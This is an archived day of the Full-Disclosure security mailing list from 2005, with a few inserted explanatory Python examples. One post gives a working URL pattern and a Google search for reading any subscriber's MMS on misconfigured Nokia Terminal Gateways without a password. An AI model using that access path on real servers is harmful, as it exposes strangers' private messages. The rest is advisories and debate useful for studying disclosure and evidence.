Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Miracle Maker (miraclemaker_gsm@yahoo.com)
Date: Thu Apr 07 2005 - 05:26:16 CDT
Nokia Terminal Gateway (TGW) is a server application used to deliver
multimedia messages to users with GSM handsets that do not support MMS.
Nokia Terminal Gateway is used by about 90 GSM operators all over the world.
When somebody sends you a multimedia message and it is not delivered to
your handset within 15 minutes or so, the message is forwarded to a
terminal gateway. Then you receive an SMS with a username and password. You
can read your MMS online using the Nokia Terminal Gateway web interface.
Of course you have to type in this username and password. Also you can
create your online album and send multimedia messages from TGW.
The most interesting part is that in some TGW installations you do not
need a username and password to access MMS.
Just type in the following and read the message delivered to the subscriber
with phone number <MSISDN>:
http://<TGW_SERVER>/<LANG>/webnonsubscriber/nonsubscribermsisdnlogin.do?msisdn=<MSISDN>
Alternatively you can go to the following URL and type in the phone number:
http://<TGW_SERVER>/<LANG>/webnonsubscriber/msisdnlogin.jsp
In most cases <LANG> can be "en" for English.
To find a working <TGW_SERVER> you can search for "webnonsubscriber" in Google :-)
Best Regards,
miraclemaker_gsm@yahoo.com
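The access pattern described in the post above, reduced to a small worked example. This is added illustration code, not Nokia's TGW code: the subscriber numbers, inbox data, function names and the 15-minute lifetime are hypothetical, and the two handlers only model the two designs. The first authenticates on nothing but the caller-supplied msisdn parameter, which is the behaviour the post reports; the second requires the username and password the gateway sent by SMS, bound to that MSISDN, with an expiry and a lockout after repeated wrong guesses, which is the check the post says some installations skip.

```python
"""Added example, not Nokia TGW code: identifier-only login versus
SMS-credential login for an MMS web inbox. All data is constructed."""
import hmac
import secrets
import time

# Constructed sample data (hypothetical): MMS waiting for two subscribers.
INBOX = {
    "+15550001111": ["photo.jpg from Alice"],
    "+15550002222": ["voice note from Bob"],
}

# Credentials the gateway would have sent by SMS once handset delivery
# failed: msisdn -> (username, password, expiry as epoch seconds).
SMS_CREDENTIALS = {}
# Failed login attempts per MSISDN, to stop online guessing of the SMS password.
FAILURES = {}
MAX_FAILURES = 5


def issue_sms_credentials(msisdn, now=None, ttl=15 * 60):
    """Simulate the SMS step: mint a short-lived username/password bound to one MSISDN."""
    if now is None:
        now = time.time()
    username = "u" + secrets.token_hex(4)
    password = secrets.token_urlsafe(9)
    SMS_CREDENTIALS[msisdn] = (username, password, now + ttl)
    FAILURES.pop(msisdn, None)
    return username, password


def vulnerable_login(params):
    """Insecure pattern: the phone number in the request is the only 'credential',
    so anyone who can guess a subscriber number reads that subscriber's MMS."""
    return INBOX.get(params.get("msisdn"))


def _eq(a, b):
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    return hmac.compare_digest(str(a).encode("utf-8"), str(b).encode("utf-8"))


def hardened_login(params, now=None):
    """Require the SMS-delivered username and password for that MSISDN,
    reject expired credentials, and lock the number after repeated failures."""
    if now is None:
        now = time.time()
    msisdn = params.get("msisdn")
    creds = SMS_CREDENTIALS.get(msisdn)
    if creds is None or FAILURES.get(msisdn, 0) >= MAX_FAILURES:
        return None
    username, password, expires = creds
    if now > expires:
        SMS_CREDENTIALS.pop(msisdn, None)
        return None
    # '&' rather than 'and' so both comparisons always run (no short-circuit timing).
    ok = _eq(params.get("username", ""), username) & _eq(params.get("password", ""), password)
    if not ok:
        FAILURES[msisdn] = FAILURES.get(msisdn, 0) + 1
        return None
    return INBOX.get(msisdn)


def demo():
    """Walk both designs through the constructed data; returns the outcomes."""
    out = {}
    out["vulnerable"] = vulnerable_login({"msisdn": "+15550001111"})
    out["no_sms_yet"] = hardened_login({"msisdn": "+15550001111"}, now=1000.0)
    u, p = issue_sms_credentials("+15550001111", now=1000.0)
    good = {"msisdn": "+15550001111", "username": u, "password": p}
    out["correct"] = hardened_login(good, now=1100.0)
    out["wrong_password"] = hardened_login(dict(good, password="guess"), now=1100.0)
    out["expired"] = hardened_login(good, now=1000.0 + 16 * 60)
    u2, p2 = issue_sms_credentials("+15550002222", now=1000.0)
    for _ in range(MAX_FAILURES):
        hardened_login({"msisdn": "+15550002222", "username": u2, "password": "guess"}, now=1001.0)
    out["locked_out"] = hardened_login({"msisdn": "+15550002222", "username": u2, "password": p2}, now=1001.0)
    return out


if __name__ == "__main__":
    print(demo())
```

The lockout and expiry matter as much as the password check itself: a password a handset user will retype from an SMS is short, so a login that accepts unlimited attempts per MSISDN is only slightly better than one that asks for nothing.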
From: Franckl - MobileBugtraq (franckl@mobilebugtraq.Com)
Date: Thu Apr 07 2005 - 06:25:14 CDT
MobileBugtraq is a new discussion mailing list about the security of mobile terminal systems, including all sorts of platforms. Topics of discussion might be related to hacking, protecting against break-ins, system bugs and exploits, etc.
The postings in this list may be written in English.
To subscribe to the MobileBugtraq list, one should send an e-mail to: subscribe@mobilebugtraq.com
(just including in the main message body (no subject is needed): subscription)
After having subscribed, one might send messages to the MobileBugtraq List at the address: post@mobilebugtraq.com
See you soon to talk about mobile security and share your knowledge.
Regards,
Franckl - http://www.mobilebugtraq.com - Symbian, 3G, Drm, Bluetooth, Java, Windows Mobile, and a lot of fun.
From: Dunceor . (dunceor@gmail.com)
Date: Thu Apr 07 2005 - 08:49:01 CDT
Since I guess this organization represents the company that has
developed this software, they should have the right to download the
software, which doesn't mean they are doing something illegal just
because he is doing an illegal thing.
On Apr 7, 2005 5:48 AM, Thomas Sutpen <sutpen@gmail.com> wrote:
> On Apr 5, 2005 5:01 AM, Ag. System Administrator <sysadmin@agent.co.il> wrote:
> > More nice will be if this .iso file is just 451,486k of /dev/random junk.
> > Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
> > MD5? Something?
>
> The question that begs to be asked is how they verified it.
> If they were to download copyrighted software from somebody sharing
> copyrighted software, does this not also constitute a crime? Is it
> not true that downloading illegally shared software is itself illegal?
> I'm not a lawyer, of course, but it's been my observation that the
> legal system doesn't often smile on those breaking the law to prove
> that others are breaking the law, unless it's in a Hollywood movie, no
> pun intended.
>
> Perhaps copyright makes some sort of concession for this. But it
> makes one wonder...
From: m0fo (editor@sec.org.il)
Date: Thu Apr 07 2005 - 11:29:44 CDT
Title: MSN Plus Password Change Security Bypass Vulnerability
Risk: Medium
Date: 07.04.2005
Publisher: m0fo (editor at sec.org.il)
Source: http://sec.org.il/articles.php?a=187
Vendor: http://www.msgplus.net
MSN Plus is an additional application for MSN Messenger. MSN Plus adds
a lot of options to the standard MSN Messenger.
One of the options is to lock your MSN Messenger with a password you choose;
this can be bypassed easily because the password can be changed without
providing the old password.
All of the MSN Plus password protections can be bypassed easily because the
vendor built them the same way.
All MSN Messenger and MSN Plus versions are vulnerable.
NOTE: successful exploitation requires that a user has logged in recently.
From: Adam Jones (ajones1@gmail.com)
Date: Thu Apr 07 2005 - 11:23:31 CDT
If you read the full message that you were replying to you would see
that he addressed this issue in his reply. Vested interest and the
parties responsible for funding research have no consequence if:
1) The methods employed are fully documented.
2) The results are fully reproducible.
3) The methods are acceptable as an unbiased appraisal of the situation.
Provided those three things are true results are results, regardless
of funding. Demonstrating any one of those three to be false
constitutes EVIDENCE of vested interest. The conclusions of the study
do not.
To answer your (probably rhetorical) question: yes, I would trust the
results of smartcard research by the manufacturer if they can prove
the above three points to my satisfaction.
On Apr 6, 2005 9:06 AM, Michael Simpson <mikie.simpson@gmail.com> wrote:
> would it have made any difference to the lancet making the decision to
> publish andrew wakefield's anti_MMR research if they had known that he
> was being paid by lawyers helping to sue the makers of the MMR vaccine
>
> yes, they wouldn't have published and we wouldn't be a mumps epidemic
> in britain.
>
> knowing that authors of a "scientific" report have a vested interest
> in a particular outcome is part of the process used for establishing
> the validity of the research
>
> would you trust your smartcard technology on the basis of a report
> funded totally by the manufacturers of said smart card or would you
> prefer some information that hasn't been potentially biased by greed?
>
> > Come on people grow up, put your prejudices aside and look at the
> > information provided, draw conclusions based on that, and be prepared to
> > change that opinion when the information to hand dictates.
>
> difficult to do without...wait for it...full-disclosure
>
From: Valdis.Kletnieks@vt.edu
Date: Thu Apr 07 2005 - 13:18:57 CDT
On Thu, 07 Apr 2005 11:23:31 CDT, Adam Jones said:
> If you read the full message that you were replying to you would see
> that he addressed this issue in his reply. Vested interest and the
> parties responsible for funding research have no consequence if:
>
> 1) The methods employed are fully documented.
> 2) The results are fully reproducible.
> 3) The methods are acceptable as an unbiased appraisal of the situation.
Of course, in the real world, the important question is "How subtle were they
in slanting the question in order to get the answer they wanted?".
> To answer your (probably rhetorical) question: yes, I would trust the
> results of smartcard research by the manufacturer if they can prove
> the above three points to my satisfaction.
The problem is that it's often hard to directly map from "Is the research
valid?" (i.e. fulfilling your 3 points above) to "Is this research actually
applicable?". If the smartcard vendor runs a test that "proves card XYZ is
invulnerable to attacks A, B, and C", that probably means that it's suitable
for use in environments that only have those 3 attacks. If, however, your
environment also needs to survive attack D, and the test was designed to
not assess the strength against D because the vendor knew their card sucked
at stopping attack D, you may be disappointed....
Remember - *most* of the sponsored research is "valid". However, most also
has been tweaked in the problem definition in order to slant the results - and
the challenge is determining if the tweaked definition is still applicable.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFCVXmPcC3lWbTT17ARAnfsAJ4vhKaiTrDWXECtYrLZQTYDQxMSMwCfbmWG
ZbVEPdg4CmguMghmJ8JzxtI=
=ChRg
-----END PGP SIGNATURE-----
From: Bryan Loveless (Bryan.Loveless@NAU.EDU)
Date: Thu Apr 07 2005 - 15:16:49 CDT
Here's your chance to shut up all those IIS people from saying it is secure.
(Or prove them right)
There is a contest to hack IIS, and the winner gets an XBOX, plus the pride
of saying that they have hacked an "impenetrable IIS environment."
http://www.hackiis6.com/
--Bryan
From: Thierry Zoller (Thierry@sniff-em.com)
Date: Thu Apr 07 2005 - 15:21:00 CDT
Dear Thomas Sutpen,
>> More nice will be if this .iso file is just 451,486k of /dev/random junk.
>> Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
>> MD5? Something?
The problem is much simpler: if 200 persons are sharing this ISO and if
it is confirmed to be a "pirated" version by downloading from ONE of
these users, you can tell that the other 199 are also sharing the same
pirated version, knowing that most (all) p2p applications use hashes to
identify the files. In other words, if 200 sources are listed, all of
them are sharing the exact same file, at least if you trust the p2p
application code. (Which you can't prove does indeed work flawlessly
in this regard, but you get my point).
--
Thierry Zoller
From: Randall Perry (lists@domain-logic.com)
Date: Thu Apr 07 2005 - 15:28:53 CDT
But that's not quite real world.
Is the server running SQL server? Oracle?
Or is it just serving static pages and is sitting behind a reverse proxy
[on FreeBSD].
There aren't any details there.
Suppose no one cracks the box, that just means someone didn't want to spill
their guts for a retail Xbox.
I can suppose there are groups out there that would rather people assume it
'really is secure' regardless of critical flaws that are publicized and
regardless of the quiet black hats that aren't falling for an x-shaped carrot
Randy.
At 03:16 PM 4/7/2005, you wrote:
>Here's your chance to shut up all those IIS people from saying it is secure.
>(Or prove them right)
>There is a contest to hack IIS, and the winner gets an XBOX, plus the pride
>of saying that they have hacked an "impenetrable IIS environment."
>
>http://www.hackiis6.com/
>
>--Bryan
>
>
http://www.domain-logic.com
From: Randall Perry (lists@domain-logic.com)
Date: Thu Apr 07 2005 - 15:41:52 CDT
At 03:21 PM 4/7/2005, you wrote:
>Dear Thomas Sutpen,
> >> More nice will be if this .iso file is just 451,486k of /dev/random junk.
> >> Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
> >> MD5? Something?
>The problem is much simpler: if 200 persons are sharing this ISO and if
>it is confirmed to be a "pirated" version by downloading from ONE of
>these users, you can tell that the other 199 are also sharing the same
>pirated version, knowing that most (all) p2p applications use hashes to
>identify the files. In other words, if 200 sources are listed, all of
>them are sharing the exact same file, at least if you trust the p2p
>application code. (Which you can't prove does indeed work flawlessly
>in this regard, but you get my point).
No, it isn't quite that clean.
The initial post was regarding the eDonkey/eMule client.
The files are broken into chunks.
The files are 'verified' by a one-way hash.
Merely having a single chunk with the same hash is enough 'evidence'
that you are in complete possession of that file.
(whether or not it is a successful full copy on your machine, they will
ONLY know if ALL sources came from ONLY YOU and they were able to rebuild
the entire ISO from all those chunks FROM ONLY YOU).
Otherwise, it is _possible_ to have a chunk with the same fingerprint and
make it appear that you have said chunk of their ISO.
(of course a 256- or 512-bit string would be more accurate and less likely
to be a false positive).
It's like saying that a brown Brinks money bag was stolen from the bank.
You possess such a Brinks money bag, but that doesn't mean it is theirs.
(those with cryptography experience can better explain than myself).
I am not very comfortable with this grey area being enough 'concrete'
evidence to condemn criminals.
What kind of computer training course do their attorneys even go through?
(or do they assume these hashes are 'fingerprints')
http://www.domain-logic.com
From: Thierry Zoller (Thierry@sniff-em.com)
Date: Thu Apr 07 2005 - 16:28:59 CDT
Dear Randall Perry,
RP> The initial post was regarding eDonkey/eMule client.
RP> The files are broken into chunks.
RP> The files are 'verified' by a one-way hash.
RP> By merely having a single chunk with the same hash is enough 'evidence'
RP> that you are in complete possesion of that file.
You forget that eMule/eDonkey reports what chunks of a specific file a host
is serving (if you download). That might be 100% of the file; that
said, you can "verify" the user has that specific file even without downloading.
(If you trust hashes, eMule and the eDonkey protocol of course).
RP> (whether or not it is a successful full copy on your machine, they will
RP> ONLY know if ALL sources came from ONLY YOU and they were able to rebuild
RP> the entire ISO from all those chunks FROM ONLY YOU).
AFAIK, this is technically incorrect but may be correct in front of a
court (where you would have to prove it can't be otherwise).
RP> Otherwise, it is _possible_ to have a chunk with the same fingerprint and
RP> make it appear that you have said chunk of their iso.
That's *AFAIK* not possible; if this were true the eDonkey/eMule
protocol would have a big design flaw and people couldn't even trade
millions of files every day, some (most?) downloads would be corrupted
as they could have potentially downloaded a wrong chunk which in fact
is from another file.
RP> (of course a 256 or 512 string would be more accurate and less to chance of
RP> being false positive).
RP> It's like saying that a brown Brinks money bag was stolen from the bank.
RP> You possess such a brinks money bag, but that doesn't mean it is theirs.
RP> (those with cryptography experience can better explain than myself).
I am sorry, I have been too long in the security field to still listen to
analogies ;) (No insult intended)
RP> (or do they assume these hashes are 'fingerprints')
Oh... well, a one-way hash (MD5, SHA etc.), technically speaking,
*IS* a fingerprint because it identifies a UNIQUE file. (collisions
possible but unlikely)
Please correct me if any of my assumptions above were incorrect.
--
Thierry Zoller
http://www.sniff-em.com
From: Randall Perry (lists@domain-logic.com)
Date: Thu Apr 07 2005 - 16:48:52 CDT
>That's *AFAIK* not possible; if this were true the eDonkey/eMule
>protocol would have a big design flaw and people couldn't even trade
>millions of files every day, some (most?) downloads would be corrupted
>as they could have potentially downloaded a wrong chunk which in fact
>is from another file.
I came across this discussion:
http://forum.emule-project.net/lofiversion/index.php/t25107-150.html
..."That's the point of file hashes. eMule doesn't work with file names for
anything apart from searches. It uses hashes. So they can say you have a
file with the same name and hash as one on e.g. ShareReactor. Now that
makes it pretty clear that you are sharing the file (this is not conclusive
but makes it very likely, see my above post). In a criminal case you might
just get off (not beyond ALL reasonable doubt) but in a civil case you are
screwed."........
The opportunity for collisions causes 'reasonable' doubt. With all the
100's of terabytes being shared on P2P, I would imagine it quite possible
for a couple of hashes to match. (again, not concrete, but _possible_)
The problem is that such evidence admitted to court sets a precedent for
plausible matches (as opposed to innocent until PROVEN beyond reasonable
doubt) to be presented as concrete fact. And I am not a P2P guy (except
BitTorrents of Fedora and Debian), but I am concerned about this mindset
for prosecution bleeding into digital signatures, encrypted emails (that
they cannot encrypt but see a string that resembles the characters 'I did
it').
Yeah, sorry about the analogies :)
http://www.domain-logic.com
From: Mike Owen (kyphros@gmail.com)
Date: Thu Apr 07 2005 - 16:52:55 CDT
On Apr 7, 2005 2:28 PM, Thierry Zoller <Thierry@sniff-em.com> wrote:
<snippage>
> RP> (or do they assume these hashes are 'fingerprints')
> Oh... well an one-way hash (Md5,sha etc) technicaly speaking
> *IS* a fingerprint because it identifies a UNIQUE file. (collisions
> possible but unlikely)
>
> Please correct me if any of my assumptions above were incorrect.
>
As reported over the last few months, MD5 is very broken. MD5
collisions are very easy to generate, with some reports of as little
as a few hours needed on reasonable hardware to generate a collision.
Here is a page with links to most of the various papers out, including
the Wang paper that started this all.
http://cryptography.hyperlink.cz/MD5_collisions.html
> --
> Thierry Zoller
> http://www.sniff-em.com
>
Mike
From: Marc Maiffret (mmaiffret@eeye.com)
Date: Thu Apr 07 2005 - 17:35:25 CDT
Has no one learned from these contests yet that they don't work, not
even for reasons of being a false way to test security, but because the
servers are never able to stay online for more than an hour because of
denial of service attacks.
The "funny" part is if the server gets DDoS'd then so will Windows IT
Pro magazine, which is hosting the hack server (now at least) on the same
subnet as their main website and with the same routes of course... Maybe
they can product-test some Arbor Networks gear while they are at it :-)
two for one.
Then again we did break our last Xbox, so hmmmm
Signed,
Marc Maiffret
Chief Hacking Officer
eEye Digital Security
T.949.349.9062
F.949.349.9329
http://eEye.com/Blink - End-Point Vulnerability Prevention
http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris - Network Traffic Analyzer
http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities
Important Notice: This email is confidential, may be legally privileged,
and is for the intended recipient only. Access, disclosure, copying,
distribution, or reliance on any of it by anyone else is prohibited and
may be a criminal offense. Please delete if obtained in error and email
confirmation to the sender.
| -----Original Message-----
| From: full-disclosure-bounces@lists.grok.org.uk
| [mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf
| Of Bryan Loveless
| Sent: Thursday, April 07, 2005 1:17 PM
| To: full-disclosure@lists.grok.org.uk
| Subject: [Full-disclosure] IIS hacking contest
|
| Here's your chance to shut up all those IIS people from
| saying it is secure.
| (Or prove them right)
| There is a contest to hack IIS, and the winner gets an XBOX,
| plus the pride of saying that they have hacked an
| "impenetrable IIS environment."
|
| http://www.hackiis6.com/
|
| --Bryan
From: Sumy (sanandres@gmail.com)
Date: Thu Apr 07 2005 - 16:44:33 CDT
This is a full article about web server defacements. Know your enemies
and their attack techniques to secure your web server. All this
information is for educational purposes ONLY; we are not responsible
for misuse of any document here.
Web Server Defacements
The urban art of graffiti has traversed to the online world in the form
of web server defacements. Just how do these online vandals do it
though? Read on to learn how it is done, and therefore gain a deeper
understanding which will help you defend against it.
There was a large commotion last year over the web server defacement
contest, which was to be held by various online miscreants. The act of
defacing a company's web site is one that has been going on for some
time now. In reality this has been practiced largely by the bottom
feeders of the internet community. To actually go out, and place your
own index.html file into a compromised web server does not take a
great deal of talent I assure you. Where the talent lies is with the
coder who discovered a web server exploit, and coded a way of
leveraging it in the first place. Once this exploit developer has
publicly released the code is when the script kiddies step in. What
the script kiddies lack in talent they make up for in numbers.
These types of attacks are relatively commonplace today. Personally
speaking I work in the network security industry, and have heard many
of my peers write off these attacks as "script kiddie" stuff. While I
would agree with them on that statement the problem is that these very
same peers of mine don't know how to do a web page defacement
themselves.
To defend you must learn to attack...
Full Article: http://www.exploitx.com/forum/azbb.php?1112907118
More articles & Tutorials? :
http://www.exploitx.com/forum/azbb.php?Tutorials_and_Articles
Security Portal: http://www.exploitx.com
Message Board: http://www.exploitx.com/forum
--
http://www.outwartips.net
http://www.exploitx.com
Please make a donation clicking on Our ads.
From: Thierry Zoller (Thierry@sniff-em.com)
Date: Thu Apr 07 2005 - 18:01:30 CDT
Dear Randall Perry,
RP> The opportunity for collisions causes 'reasonable' doubt. With all the
RP> 100's of terabytes being shared on P2P, I would imagine it quite possible
RP> for a couple of hashes to match. (again, not concrete, but _possible_)
RP> The problem is that such evidence admitted to court sets precedence for
RP> plausible matches (as opposed to innocent until PROVEN beyond reasonable
RP> doubt) to be presented as concrete fact. And I am not a P2P guy (except
RP> BitTorrents of Fedora and Debian), but I am concerned about this mindset
RP> for prosecution bleeding into digital signatures, encrypted emails (that
RP> they cannot encrypt but see a string that resembles the characters 'I did
RP> it' ).
You forget that the hash is not the only unique thing that specific file
has in common with the pirated file/material.
Calculate the following probability:
- The file/chunk has the same MD5 (or whatever HASH)
as the pirated material in question.
- The file has the EXACT same filename (if there were a collision,
what is the probability, in mathematical terms, that the file the
collision takes place with has the exact same filename?)
- The file has the EXACT same size (The file has the EXACT same date
etc.pp)
I am sorry, but considering all these factors, don't we have to conclude the
file is indeed THE file? ;)
<Wild Speculation> Do the maths, you probably get to a probability which is equally
as likely as a parental test based on DNA, which is accepted in some courts.</Wild Speculation>
--
Thierry Zoller
From: Poof (poof@fansubber.com)
Date: Thu Apr 07 2005 - 18:11:26 CDT
Ahh, but what if said user is falsifying MD5sums with same size files in
order to help hinder piracy of said product?
In order to say that -I- am sharing Fedora.iso(Just an example.) you'd have
to download it and run it yourself. You can't just say that the MD5sum,
size, and name all match so it has to be the same product.
That's why if you wanted, you could sell bags of flour as cocaine and not be
charged with drug dealing. Fine, it looks the same and weighs the same,
however it isn't the product that's illegal. And to prove that it's illegal,
they need to test it.
You know what... I should just shut up. I always write sucky posts to FD.
~
> You forget that the hash is not the only unique thing that specific file
> has in common with the pirated file/material.
>
> Calculate the following probability:
>
> - The file/chunk has the same MD5 (or whatever HASH)
> as the pirated material in question.
> - The file has the EXACT same filename (if there were a collision,
> what is the probability, in mathematical terms, that the file the
> collision takes place with has the exact same filename?)
> - The file has the EXACT same size (The file has the EXACT same date
> etc.pp)
>
> I am sorry, but considering all these factors, don't we have to conclude the
> file is indeed THE file? ;)
>
> <Wild Speculation> Do the maths, you probably get to a probability which is
> equally as likely
> as a parental test based on DNA, which is accepted in some courts.</Wild
> Speculation>
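The chunk-hash question Randall and Thierry argue over above, Mike's note on MD5 collisions, and Poof's point that a matching name, size and digest is still not the content itself, as one small added example. This is my illustration code, not eMule's. It models eD2k-style part hashing, where a peer advertises one digest per part and the whole-file identifier is a digest over the part digests; the real protocol hashes 9728000-byte parts with MD4, and SHA-256 with a tiny part size is substituted here so it runs on any current Python build. The sample files are constructed. The last function is the birthday bound for accidental collisions, which is the only kind the "hundreds of terabytes on P2P" argument can produce; the deliberate, chosen-content collisions in the MD5 papers Mike links to are a different matter and are not covered by that number.

```python
"""Added example, not eMule code: eD2k-style part hashes, what a partial
match proves, and the birthday bound for accidental collisions."""
import hashlib
import math

# eD2k splits files into parts of this many bytes (9500 KiB) and hashes each part.
PART_SIZE = 9728000


def chunk_hashes(data, hash_name="sha256", part_size=PART_SIZE):
    """Per-part digests, like the part hashes an eD2k peer advertises.
    The real protocol uses MD4; SHA-256 is substituted so the code runs on
    Python builds whose OpenSSL no longer exposes MD4."""
    return [hashlib.new(hash_name, data[i:i + part_size]).hexdigest()
            for i in range(0, len(data), part_size)]


def file_hash(hashes, hash_name="sha256"):
    """Whole-file identifier: the single part hash for a one-part file,
    otherwise a digest over all part hashes concatenated (the eD2k scheme)."""
    if len(hashes) == 1:
        return hashes[0]
    joined = b"".join(bytes.fromhex(h) for h in hashes)
    return hashlib.new(hash_name, joined).hexdigest()


def shared_chunks(mine, theirs):
    """Indices of parts whose digests agree between two advertised lists.
    A match here proves possession of exactly those parts, nothing more."""
    return [i for i, (a, b) in enumerate(zip(mine, theirs)) if a == b]


def accidental_collision_probability(n_items, hash_bits):
    """Birthday bound: probability that at least two of n_items random
    digests of hash_bits bits coincide, 1 - exp(-n^2 / 2^(bits+1)).
    expm1 keeps precision when the answer is tiny."""
    x = (n_items ** 2) / 2 ** (hash_bits + 1)
    return -math.expm1(-x)


def demo():
    """Run the scenario on constructed data; returns the outcomes."""
    # Two constructed 'files' of three parts each, same size, differing only
    # in the last part (a tiny part size keeps the example instant).
    part = 1024
    original = b"A" * part + b"B" * part + b"C" * part
    lookalike = b"A" * part + b"B" * part + b"X" * part
    h_orig = chunk_hashes(original, part_size=part)
    h_look = chunk_hashes(lookalike, part_size=part)
    return {
        # parts 0 and 1 match, part 2 does not
        "shared_chunks": shared_chunks(h_orig, h_look),
        # the whole-file identifier differs, so 'same name and size' is not 'same file'
        "same_file_hash": file_hash(h_orig) == file_hash(h_look),
        # ~1e8 parts is roughly a petabyte of 9.5 MB parts: accidental 128-bit
        # collision is still negligible
        "p_accidental_128bit_1e8": accidental_collision_probability(1e8, 128),
        # for contrast, a 32-bit digest over 1e5 items collides more often than not
        "p_accidental_32bit_1e5": accidental_collision_probability(1e5, 32),
    }


if __name__ == "__main__":
    print(demo())
```

Two things fall out of it. A peer whose advertised list matches on parts 0 and 1 but not part 2 has proven possession of those two parts and nothing more, which is Randall's point and also why the protocol can report which parts a host serves, which is Thierry's. And the accidental-collision probability for 1e8 parts at 128 bits is on the order of 1e-23, so "quite possible for a couple of hashes to match" does not hold for accidents, only for someone constructing a collision on purpose, which is exactly what the MD5 work Mike cites does, and MD4 is the weaker of the two.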
From: Jason Coombs (jasonc@science.org)
Date: Thu Apr 07 2005 - 18:14:35 CDT
Come on, people, get a clue.
The copyright owner has authorized the forensic investigators to download the infringing material. If it was there, according to a forensic investigator, then you have to prove it was not.
Please stop viewing the world as a level playing field populated by absolutes. By design, and by intent, the world is not a level playing field - if you are a consumer, a renter, and a worker then you are a slave to producers, owners, and employers.
Live with it, or don't, but to live while grossly misunderstanding it is truly absurd.
Regards,
Jason Coombs
jasonc@science.org
From: H D Moore (fdlist@digitaloffense.net)
Date: Thu Apr 07 2005 - 18:18:44 CDT
Marc,
I will buy you *two* Xboxes for a nice IIS 6.0 remote :-)
Seriously, the "market value" of a remote exploit for IIS 6.0 is
somewhere between two and twenty thousand dollars, depending on how
shady you want to get. These "find some 0day and give it to us"
challenges are a waste of time in terms of product security; it's just
blatant exploitation (the bad kind).
-HD
On Thursday 07 April 2005 17:35, Marc Maiffret wrote:
> The "funny" part is if the server gets DDoS'd then so will Windows IT
> Pro magazine whom is hosting the hack server (now at least) on the same
> subnet as their main website and with the same routes of course...
> Maybe they can product test some Arbor networks gear while they are at
> it :-) two for one.
>
> Then again we did break our last xbox, so hmmmm
>
> Signed,
> Marc Maiffret
From: Thierry Zoller (Thierry@sniff-em.com)
Date: Thu Apr 07 2005 - 18:25:42 CDT
Dear Jason Coombs,
JC> Come on, people, get a clue.
JC> The copyright owner has authorized the forensic investigators
JC> to download the infringing material.
JC> If it was there, according to
JC> a forensic investigator, then you have to prove it was not.
In what jurisdiction? The world? FD is certainly not US based. So
please, with all due respect, the one who needs to get a clue is you.
At least in that part of the thread I posted to, we were discussing
technical issues, have nothing to say? Don't.
[CUT philosophical BLA BLA]
--
Regards,
Thierry Zoller
From: Anders Breindahl (skrewz@skrewz.dk)
Date: Thu Apr 07 2005 - 18:33:37 CDT
Well, a friend of mine also got a mail like this once. This letter consisted
of approximately the same as yours did -- the difference being that he had
never seen the file, nor heard of it.
I would tend to say that this -- if you believe me, again believing in my
trust in my friend -- makes your idea of their investigation methods
impossible?
I actually received your post to FD as a warning of an upcoming new wave of
spam... Or what ever annoying Internet-abuse is called in general terms.
Regards, Anders Breindahl.
On Friday 08 April 2005 01:10, Jason Coombs wrote:
> Come on, people, get a clue.
>
> The copyright owner has authorized the forensic investigators to download
> the infringing material. If it was there, according to a forensic
> investigator, then you have to prove it was not.
>
> Please stop viewing the world as a level playing field populated by
> absolutes. By design, and by intent, the world is not a level playing field
> - if you are a consumer, a renter, and a worker then you are a slave to
> producers, owners, and employers.
>
> Live with it, or don't, but to live while grossly misunderstanding it is
> truly absurd.
>
> Regards,
>
> Jason Coombs
> jasonc at science.org
From: Ron DuFresne (dufresne at winternet.com)
Date: Thu Apr 07 2005 - 18:40:27 CDT
On Thu, 7 Apr 2005, Poof wrote:
[SNIP]
> That's why if you wanted, you could sell bags of flour as cocaine and not be
> charged with drug dealing. Fine, it looks the same and weighs the same,
> however it isn't the product that's illegal. And to prove that it's illegal,
> they need to test it.
>
Actually, at least in the US, there is a law <dang I forget what it's
called> that would make this illegal and subject one to prison time...
Thanks,
Ron DuFresne
--
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
From: Jason Coombs (jasonc at science.org)
Date: Thu Apr 07 2005 - 18:55:56 CDT
'Security' is ENTIRELY philosophical.
Go use a dictionary. You'll learn something.
Jason Coombs
jasonc at science.org
-----Original Message-----
From: Thierry Zoller <Thierry at sniff-em.com>
Date: Fri, 8 Apr 2005 01:25:42
To: "Jason Coombs" <jasonc at science.org>
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Re: Case ID 51560370 - Notice of Claimed Infringement
Dear Jason Coombs,
JC> Come on, people, get a clue.
JC> The copyright owner has authorized the forensic investigators
JC> to download the infringing material.
JC> If it was there, according to
JC> a forensic investigator, then you have to prove it was not.
In what jurisdiction? The world? FD is certainly not US based. So
please with all due respect, the one who needs to get a clue is you.
At least in that part of the thread I posted to, we were discussing
technical issues, have nothing to say? Don't.
[CUT philosophical BLA BLA]
--
Regards,
Thierry Zoller
From: Jason (security at brvenik.com)
Date: Thu Apr 07 2005 - 20:26:14 CDT
IANAL but it seems this thought process is broken.
Jason Coombs wrote:
> Come on, people, get a clue.
>
> The copyright owner has authorized the forensic investigators to
> download the infringing material. If it was there, according to a
> forensic investigator, then you have to prove it was not.
This position does not hold water, there is no way for them to not break
the same laws they would be attempting to enforce by performing the
investigation from a remote location and without a valid search warrant.
You do not have to prove that you did not have the content, you only
have to prove that you have content that appears very similar to the
remote reviewer.
If you were to place a copyrighted work of your own there then would
they be forced to download it and break the law in order to prove that
it was not the other copyright owners property? If they show in the logs
as having attempted a download does this make them guilty?
It is as simple as creating a server that will return filenames and
hashes found on the network but actually provide /dev/random for the
download or your copyrighted content with an engineered hash collision.
It only takes one case to prevent the civil suit from being filed. To
file the suit would be admitting to having broken the law. You cannot
bring suit when the basis of the suit is itself illegal activity.
From: AJ C (spook3y3s at gmail.com)
